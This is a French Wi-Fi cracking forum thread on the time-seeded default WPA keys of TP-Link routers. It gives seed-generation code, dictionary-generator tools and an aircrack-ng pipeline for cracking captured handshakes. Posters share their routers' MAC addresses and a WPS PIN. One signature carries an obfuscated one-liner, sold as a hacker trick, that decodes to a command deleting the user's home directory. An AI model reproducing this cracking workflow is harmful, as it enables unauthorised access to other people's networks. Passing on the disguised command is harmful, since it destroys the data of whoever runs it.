Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-03-2013 19:30:51

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Voici une découverte très intéressante publiée sur son blog par Alex altea The Function Mixer: Matematicas, programacion, seguridad > Vulnerabilidad de TP-Link al generar keys WPA2 et dans ce topic de lampiweb.com : Vulnerabilidad al generar claves WPA2 / WEP en TP-LINK_XXXXXX

  Pour les non-hispanophone je vous présente en quelques lignes ce travail.
 

ROUTEURS CONCERNES

  Il s'agit des routeurs mis sur le marché par TP-Link après 2010 .
Voici une liste des modèles, il a été possible à Alex altea de vérifier 90% de cette liste.

TL-W8151N    (V1, V3)
TL-WA730RE   (V1, V2*)
TL-WA830RE   (V1, V2*)
TL-WDR3500
TL-WDR3600
TL-WDR4300
TL-WR720N
TL-WR740N    (V1, V2, V3, V4)
TL-WR741ND   (V1, V2, V3*,V4)
TL-WR841N    (V1*,V5, V7, V8)
TL-WR841ND   (V3, V5, V7, V8*)
TL-WR842ND
TL-WR940N    (V1, V2)
TL-WR941ND   (V2, V3, V4, V5)
TL-WR1043N
TL-WR1043ND
TD-VG3511    (V1*)
TD-VG3631
TD-W8901N
TD-W8950ND
TD-W8951NB   (V3*,V4, V5)
TD-W8951ND   (V1, V3, V4, V5)
TD-W8960N    (V1, V3, V4)
TD-W8961NB   (V1, V2, V3*)
TD-W8961ND
TD-W8968
TD-W8970

*Possibles, non vérfié

LA FAILLE DE SECURITE


  La clef par défaut WPA/WPA2 - WEP est de respectivement 10 à 13 caractères (apparemment seulement chiffres et lettres majuscules) et est générée aléatoirement par Easy SetUp Assistant
  Pour nous centrer sur le WPA qui nous intéresse, une attaque brute force avec une vitesse de 2000 PMK nous prendrait 3610 / 20000 = 3656158440062976 clefs / 20000 clefs/s = 5796,8011 ans
  A priori impossible.
  Or, en désassemblant l'assistant de configuration de TP-Link, notre compère a observé que le générateur de la clef était un générateur de congruence linéaire qui utilise des seeds de 32 bits.
En d'autres termes, les probabilités pour les clefs WEP ou WPA se réduisent à 2^32

  Ajoutons à cela que la seed i et (i+0x80000000) génèrent la même clef, il y a donc dans chaque groupe de clef généré une clef dupliquée ce qui réduit encore le champ des possibles et nouas sommes à 2³31 possibilités
  Avec notre dorinateur à 2000 clef/seconde (rien de bien exceptionnel de nos jours, un bon microprocesseur ou une carte graphique PCI-E premier prix vous permettent facilement d'atteindre ces vitesse)
   2^31 / 20000 = 1,24 jours

  C'est déjà pas mal comme réduction n'est il pas?
Oui mais c'était hier, et aujourd'hui c'est aujourd'hui et Alex ne se le pardonnera jamais (c'est ce qu'il a dit) car il a oublié
 

·era que la seed es un número que crece linealmente en función del tiempo del ordenador, obtenido a través de un KERNEL32.GetSystemTimeAsFileTime. Es decir, la seed NO es aleatoria, sino que es un valor fijo que aumenta en 1 cada segundo. El código en Python para generar una seed ahora mismo es:"

  IL avait oublié que la seeds est un numéro qui augmente de façon linéaire en fonction du temps de l'ordinateur obtenu à travers d'un KERNEL32.GetSystemTimeAsFileTime.
  Ben voyons Alex tongue  faut arrêter les bigsmoke
Petit chenapan, on te pardonne  wink
  En d'autres termes, nôtre seed n'est pas aléatoire avec un brute force sur toutes les possibilités.... non, notre seeds va dépendre du temps.... c'est une valeur déterminée qui va en augmentant au fil des secondes qui passent de un en un
tic, tac, +2 etc...

  Nous pouvons donc réduire de 2³¹ à un intervalle de temps donné.

  Exemple, nous savons qu'un routeur a été installé il y a un an, sans plus de détails. En sachant cela nous n'avons plus qu'à vérifier les seeds comprises entre  0x4EFFA3AD et 0x50E22700.

genSeed(datetime.datetime(2012, 1, 1, 0, 0, 0)) #0x4EFFA3AD
genSeed(datetime.datetime(2013, 1, 1, 0, 0, 0)) #0x50E22700 

  Un an se sont environs. 365*24*60*60 = 31536000 seg. (c'est à dire 0x50E22700 - 0x4EFFA3AD).
  Nous nous retrouvons donc avec 31 536 000 clefs possibles, quatres heures et demi de crack avec notre ordinateur 2000 key secondes.
   Encore plus grave si un éventuel observateur mal intentionné voit apparaître un routeur dans son rayon d'action du jour au lendemain, si il s'agit d'un routeur récemment installé avec la clef par défaut de l'assistant nous serions à 24*60*60 = 86400 combinaisons, à la portée d'un ordi mini (ou presque).


TOOLS

Voici deux tools pour exploiter cette brèche

capturamc.png


TPLink-GenSeeds

Ce programme cherche définit l'intervalle de seeds à balayer selon une datte de début et de fin ou seulement autours d'une date (les jours proches de celle-ci).
Pour que ce soit plus agréable il y a une petite GUI pour linux et windows (avec linux elle peut être un peu déformée selon la distro)

Pour windows c'est un .exe, pour linux il vous suffit de faire en console

python TPLink-GenSeeds-Linux.pyw

Si vous rencontrez des difficultés c'est probablement parce que vous avez besoin de

sudo apt-get install python-wxgtk2.8

wink



TPLink-GenKeys

Sélectionnez le genre de clef (nous savons que le WEP est dépassé mais bon, quitte à y être tongue ).
Vous indiquez le rang de seeds calculé (grâce au programme antèrieur) vous aurez l'information sur la liste et si vous continuez vous obtiendrez la liste dans  "./output.txt".

Alex nous demande pardons pour ne pas encore avoir finit une GUI permettant de tout faire en une fois.
Nous l'excusons parce que nous sommes magnanimes et bons. tongue




  Pour pouvoir améliorer l'attaque il nous faudrait faire tous ensembles une base de données de TP-Link pour pouvoir lier les différents bssid avec des dates de fabrications, des dates de mise en services etc... Nous pourrions affiner l'attaque, l'optimiser en écartant les heures improbables mais cette base de données serait un outil très intéressant et fort utile.

  Je lance un appel aux données TP-Link pour pouvoir les passer à alex et au groupe de travail lampiweb.com afin de mettre en pied cette base de données, ce que nous pouvons faire aussi dans ce topic, par MP, comme vous voulez, bref, définir des dates selon bssid - routeurs pour pouvoir faire un tool plus précis.

  Sur cette bonne nouvelle je vous souhaite une très bonne soirée.... peut être, je dis bien peut être, certains d'entre vous sont déjà en train de faire chauffer les Nvidia et les alfa tongue
  A +. wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 12-03-2013 20:12:09

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

C'est juste énorme, encore une belle brochette de routeurs Wifi dont la passphrase par défaut est désormais vulnérable. Mais ou vont donc s'arreter nos amis espagnols? big_smile

Hors Ligne

#3 16-03-2013 01:14:11

supperdd
Membre
Inscription : 26-07-2012
Messages : 12

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

je me ferai une joie de vous donner les infos qu'il vous faut j'ai un ap tp-link "WA901N v2" je ne sais pas si ca vous intéresse ??
MAC Address:    64-70-02-7F-30-B6
mais pour le reset je ne vois pas ??

Hors Ligne

#4 16-03-2013 12:57:09

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Merci beaucoup wink
Je crois, mais je ne suis pas sûr, que sur les derniers routeurs N TP-Link, si tu maintiens enfoncé le "push boutton WPS" plus de 5 secondes tu fais un reset au routeur.

Hors Ligne

#5 08-04-2013 11:36:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Salut smile

Sur un WR1043ND que j'utilise a l'occasion.

S/N version 1.8  10B67407851
Mac adress: 74:EA:3A:E4:53:0C
pin WPS: 95449654

Ps: le reset est derrière le routeur, un petit bouton gris.

Dernière modification par koala (08-04-2013 11:38:30)

Hors Ligne

#6 01-05-2015 23:04:00

K4L-EL
Nouveau membre
Inscription : 29-04-2015
Messages : 7

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Bonjour, désolé de déterrer ce topic mais je le fait pour les gens qui comme moi on rencontré des problème lors de la création du fichier .txt.
Je précise que je suis sur windows 8.1 pour le keygen vu que je n'arrive pas à le faire marcher sur kali.
Voila donc un lien d'un pack contenant tout le nécéssaire pour la génération d'un dictionnaire de TP-Link:http://www.mediafire.com/download/gor6b … -v1c.x.zip
Et le lien du forum anglais qui donne ce lien et qui parle du pack: http://www.backtrack-linux.org/forums/s … hp?t=62673

Hors Ligne

#7 16-08-2015 08:08:06

MlleParker
Membre
Inscription : 14-08-2015
Messages : 19

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Une rainbow table doit être calculable. En relisant les codes sources donnés par le post juste au dessus du mien (#6), je pense cela tout à fait réalisable, tant du point de vue coding que de celui temps/puissance.

Quelqu'un s'est t'il penché sur le code source Python du script TPLink-GenSeeds-Linux.py ? (Pastebin)

Je ne comprends pas ce que fait exactement la fonction genSeed() (ligne 5) ni les valeurs hardcodées dans cette fonction. Si quelqu'un pouvait expliquer. smile

def genSeed(t1):
    dt = t1 - datetime.datetime(1601, 1, 1, 0, 0, 0)
    t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10

    tA = (t/2**32 + 0xFE624E21)
    tB = (t%2**32 + 0x2AC18000) % (1<<32)

    if tA >= (1<<32):
        tA += 1
        tA %= 1<<32

    r = (tA % 0x989680) * (2**32)
    r = ((r + tB) / 0x989680) % (2**31)
    return r

t1 est un objet datetime, donc une date avec une heure.

dt = t1 - datetime.datetime(1601, 1, 1, 0, 0, 0) 

On soustrait t1 à la date du 1er Janvier 1601 à 00:00:00, ce qui nous donne le delta dt. Pourquoi cette date du 1er Janvier 1601 ? Mystère...
Ensuite :

t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10

Si je comprends ce que fait cette ligne, je ne comprends pas d'où viennent les valeurs 864000000000, 10000000 et 10.

tA = (t/2**32 + 0xFE624E21)
tB = (t%2**32 + 0x2AC18000) % (1<<32)

2^32 est notre keyspace absolu, ok, mais qu'est ce que 0xFE624E21 et 0x2AC18000 ? D'où ces valeurs prennent leur origine ?

Dernière modification par MlleParker (16-08-2015 11:31:41)

Hors Ligne

#8 17-08-2015 16:11:36

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Préambule : Moi ne pas connaitre python et ne pas savoir programmer et ne pas avoir étudié les maths etc...
1601 je crois que c'est parceque c'est l'année de naissance de pierre fermat qui était un chanteur très connu à l'époque, une espèce de patrick bruel de l"époque, très en vogue à la cours de françois premier . J'déconne
Ce que mon petit cerveau limité me dit c'est que, si j'ai compris, la graine est la date.
mais j'imagine que les fabricants de tp-link ont évité fort logiquement les graines 0, 01 etc...
la croissance est linéaire et se fait seconde par seconde
Donc pour avoir un niveau d'entropie correct ils ont du décider que 1601 serait leur date avec valeur "0" pour que les dates comprises entre 2010 et 2015 ou plus aient des graines avec une valeur élevée.

Si je comprends ce que fait cette ligne, je ne comprends pas d'où viennent les valeurs 864000000000, 10000000 et 10.

Moi pas (je ne comprends pas ce que fait cette ligne)
Et ce qui me déroute le plus ce sont les micro-secondes...

2^32 est notre keyspace absolu, ok, mais qu'est ce que 0xFE624E21 et 0x2AC18000 ? D'où ces valeurs prennent leur origine ?

Ça doit sûrement être l'âge du capitaine moins celui du  Grand Schtroumpf hmm
Plus sérieusement : Il y a Mr Spawn pour qui tout ceci c'est comme lire le journal, il devrait passer par ici un de ces  quatre et pourra t'éclairer (nous) de ces lumières à ce sujet.
J'aurais bien posé la question a  alex altea mais apparemment son blog est mort hmm
sinon je chercherai son mail que je dois avoir quelque part....
meow wink

PS: je viens de demander au copain de mon cousin qui s'y connait en python et a fait de belles et longues études et qui m'a dit que peut être je devrais creuser du côté du nombre de mersenne

Hors Ligne

#9 17-08-2015 18:38:31

MlleParker
Membre
Inscription : 14-08-2015
Messages : 19

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Merci de ta réponse. smile
J'ai potassé de mon coté également et j'ai quelques retours.

Ton explication sur la date du 1er Janvier 1601 semble cohérente. Cependant je souhaiterais en avoir la certitude.

kcdtv a écrit :

Moi pas (je ne comprends pas ce que fait cette ligne)
Et ce qui me déroute le plus ce sont les micro-secondes...

C'est tout bête en fait, je t'explique en vulgarisant un peu pour aider à la compréhension.

$ python
Python 2.7.3 (default, Mar 13 2014, 11:03:55) 
[GCC 4.7.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import datetime
>>> dt = datetime.datetime(2015, 1, 1, 0, 0, 0) - datetime.datetime(1601, 1, 1, 0, 0, 0) 
>>> dt.days
151210
>>> dt.seconds
0
>>> dt.microseconds
0
>>> t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10
>>> t
130645440000000000

"datetime" est une librairie fournit par Python en standard. (https://docs.python.org/2/library/datetime.html) Donc pour l'utiliser, je dois la "charger", le terme exact étant l'importer.
La ligne suivante reprend le code d'Alex qui est celui là :

dt = t1 - datetime.datetime(1601, 1, 1, 0, 0, 0)

"t1" est une variable contenant un objet datetime, donc t1 est équivalent à cette écriture :

datetime.datetime(year, month, day, hour, minute, second, microsecond )

Ce n'est finalement qu'une représentation d'une date précise en Python. Rien de bien méchant. En fait, Alex, fait une soustraction entre deux dates, il cherche à obtenir l'écart. Cet écart s'appelle un delta. Le delta obtenu, si j'ai bien saisi, devient notre entropie qui remplace l'ancienne entropie maximale qui était 2^31.  Je pense qu'il a nommé sa variable "dt" pour sous entendre "delta time".

dt.days nous donne le nombre de jours de notre delta.
dt.seconds, le nombre de secondes du delta.
dt.microsecondes, le nombre de centièmes de seconde du delta.

Maintenant, cela va se compliquer un peu plus du fait que je ne comprends pas ce que Alex fait avec cette ligne :

t = dt.days*864000000000 + dt.seconds*10000000 + dt.microseconds*10

Je ne comprends ni le but du calcul ni les valeurs en dur. De ce fait, je ne comprends pas le résultat. (Et tout le monde sait que je pêche en math maintenant tongue ).  J'ai été demander à Google si il connaissait la valeur 864000000000 et il connait effectivement. 864000000000 serait une valeur exprimée en tick. Ne sachant pas ce que sont les ticks, j'ai cherché et la réponse est la suivante :

1 tick = 1/60 seconde. 

C'est une unité de temps mais je n'ai pas la moindre idée de ce à quoi elle sert ni comment on l'utilise. 864000000000 semble être une constante en mathématique, tout comme Pi ou le nombre d'Avrogadro ect. Je n'en sais pas plus hélas, les lumières de ton cousin seraient les bienvenues car le lien vers Wikipédia que tu donnes semble correspondre à notre histoire de congruence linéaire. De ce fait, je pense que ton cousin a vu juste. All glory to him tongue

Ce qui doit me bloquer dans ma compréhension vient très certainement du fait que je ne connais pas la congruence linéaire et donc j'ignore les équations en relation. Cependant, cela n'explique en rien les valeurs hexadécimales en dur. Tout cela reste à éclaircir.

J'attends avec impatience le retour (ou l'apparition tongue) de Spawn et les lumières de ton cousin. Je pense qu'il ne reste plus grand chose à démystifier, j'y suis presque mais comme toujours, ce sont les derniers mètres qui nous séparent de la ligne d'arrivée qui sont les plus durs à réaliser. smile

Meow meow ! tongue

Hors Ligne

#10 17-08-2015 21:08:59

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Le petit copain de mon cousin a apprécié le "glory to him" et il te fait un clin d’œil big_smile
Du coup il m'a expliqué en deux secondes le pourquoi de 864000000000
la réponse

10×10^6×60×60×24

en fait il s'agit de passer la date en 10ème de microsecondes
10 (10èemes)x10⁶ (sont les microsecondes, ce n'est pas 10³ wink ) x 60 x 60 ( 3600= heure) x 24 (un jour à 24 heures) =  864000000000
On l'appelle "wikipedia"  dans la famille, tu comprends pourquoi big_smile
IL va falloir que je me mette à python, ça fait deux ans que je dis ça, mais il va falloir
meow

Hors Ligne

#11 30-08-2015 11:12:52

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Coucou.

Pour mon 1000ème message, je vais vous envoyer vers mon blog, la flemme de recopier ici : http://méric.fr/blog/tplink.html.

J'ai répondu aux différentes questions.
Les constantes sont celles qu'on retrouve dans le .exe de TPLINK.
Le premier janvier 1601, c'est Microsoft qui l'a décidé.

J'ai une question pour alex : on voit 0x93406FFF dans gen_seed, je n'ai pas bien compris à quoi elle sert.
Est-ce qu'il n'y a pas un cas où cette constante entre en jeu dans l'algo ?
r4.png
r5.png

Bisous <3


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#12 30-08-2015 19:23:33

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Tu nous a régalé pour ton 1000ème post  cool
plus_un pour "L'interface la plus droguée du monde"  big_smile
J'envoie un petit mail à Alex pour ce qui est de  0x93406FFF.
Et un autre à Bil Gate pour savoir pourquoi Microsoft a choisit 1601 tongue
j'ai pas trouvé d'autres voi de communication avec alex latea que son twit http://www.twitter.com/#!/AlexAltea ou son faceboock, http://www.facebook.com/profile.php?id=100002089860564comme je n'ai ni l'un ou l'autre...
si quelqu'un veut bien faire passer la question  qu'il me le dise et je la rédigeais en espagnol, ceci dit il parle parfaitement anglais...

Dernière modification par kcdtv (30-08-2015 23:09:47)

Hors Ligne

#13 02-10-2015 23:26:55

BobX64
Nouveau membre
Inscription : 02-10-2015
Messages : 7

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Bonsoir à vous!
Pour info j'ai un routeur TP-Link un TD-W8960N (v6)
    -Firmware version: 1.1.1 Build 150228 Rel.32743
        -Hardware version: TD-W8960N V6
Passkey WPA par défault: 87577730
Je me suis amusé à cracker la clef avec oclHashcat, en générant un dico adapté qui teste les clefs avec quelque restriction ne pas générer les clefs dont les chiffres se répétent plus de 4 fois. Ca à mis 16 minutes pour trouver la clef smile (avec 2x nVidia 580GTX  90.000key/s)

Par contre dans l'interface d'administration on ne peu que rentrer une nouvelle clef manuellement, on peu pas la générer wink
Voilà si ma maigre contribution peu aider wink

Ah j'oubliai une chose importante aussi le WPS est activé par défault aussi wink et sans restriction (genre push button)

Dernière modification par BobX64 (02-10-2015 23:29:09)

Hors Ligne

#14 05-10-2015 13:06:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Merci pour le retour
Au npassage tu peux me même diviser par dix le tempos de crack en utilisant un diccionaire de PIN WPS (le huitième numéro est un checksum)
Car avec ces modèles tu as comme clef WPA par défaut le PIN WPS
Le tool de Añlex Altea c'est pour génŕer la clef configurée par l'"EasySetupAssitant".

  Comme on a reparlé de ce tool j'ai essayé de le faire topuné sous linux et je me suis rendu compte qu'il y a un petit bug, facile de résoudre.
  Le script fait un appel à un petit code C ( TPLink-GenKeys2  ) qui est déjà compilé et qui se trouve à côté du script dans le dossier PLink-AttackDictionary-v1c.x
  Le code en C se charge de générer les pass en utilisant les graines.
  Et on se plante: 1444045620.png
  Facile de résoudre : Il suffit de compiler de nouveau le code source que nous a inteligament laissé AlexAltea dans le même dossier...
  On ouvre une shell et on compile :

g++ -Wall -o TPLink-GenKeys2 TPLink-GenKeys2.cpp

  voili voilou, on peut lancer le script en python et générer à toute vitesse nos dic. cool

1444045995.png

Du coup, si on veut passer le dictionnaire au vol avec aircrack ou hascat ou pyrit on peut utiliser directement le programme en C en pipe.
Il vous suffit de mettre la valeur dictionnaire de la graine de début et de celle de la fin.
Vous pouvez les obtenir en lançant le script en python avec les parmètres choisit et au lieu de répondre "y" à "continuer" vous lancez vous mêmes TPLink-GenKeys2 en pipe
Example : je veux faire un brute force sur presque  un an.
Je lance le script en python avec mes paramètres:

python TPLink-GenKeysFinal.py --start 01/11/2014

et je répond "no" à la question continue:

Information:
 [*] Starting date:               01/11/2014
 [*] Ending date:                 05/10/2015
 [*] Initial seed:                1414800429 (0x5454242D in hexadecimal)
 [*] Final date:                  1444053535 (0x5612821F in hexadecimal)
 [*] Total seeds/passwords:       29253107
 [*] Size of dictionary:          306.9 MB (WPA/WPA2)
 [*] Estimated time of cracking:  24.4 min. (GPU) or 4.1 hours (CPU)

Continue? (y/n): n

Le programme s'arrête et j'ai la valeur des deux graines pour mon intervalle (intial y final seed)
Je peux donc lancer mon attaque "au vol" ainsi

./TPLink-GenKeys2 1414800429 1444053979 | | aircrack-ng -e <eSSID> -w - handshake.cap

Dernière modification par kcdtv (05-10-2015 13:08:53)

Hors Ligne

#15 05-10-2015 13:44:46

BobX64
Nouveau membre
Inscription : 02-10-2015
Messages : 7

Re : Exploiter faille TP-LINK_XXXXXX pass WPA par défaut (by AlexAltea)

Merci pour l'info cependant ce script ne fonctionne pas avec avec le TP-Link TD-W8960N qui est pour ma part en version 6. Je pense qu'ils ont simplement décalé la clef vers le haut ?! Car le pass commence par 87 hors dans ton screenshot je vois que les clefs s'arrête à 561275E9. Hors ma clef est 87577730. D'ailleurs tu remarquera que la clef ne comporte que des chiffres sur mon routeur wink est-ce le hazard ou tous les nouveaux modèles sont comme ça??

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 160 29-10-2016 11:12:05 par sukawa2007
11 444 05-09-2016 15:07:25 par MiscL
Épinglée :
185 185441 10-07-2016 19:35:20 par Seska
81 15757 29-06-2016 10:27:55 par Fab955
21 8231 15-01-2016 13:53:04 par kcdtv

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.073 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]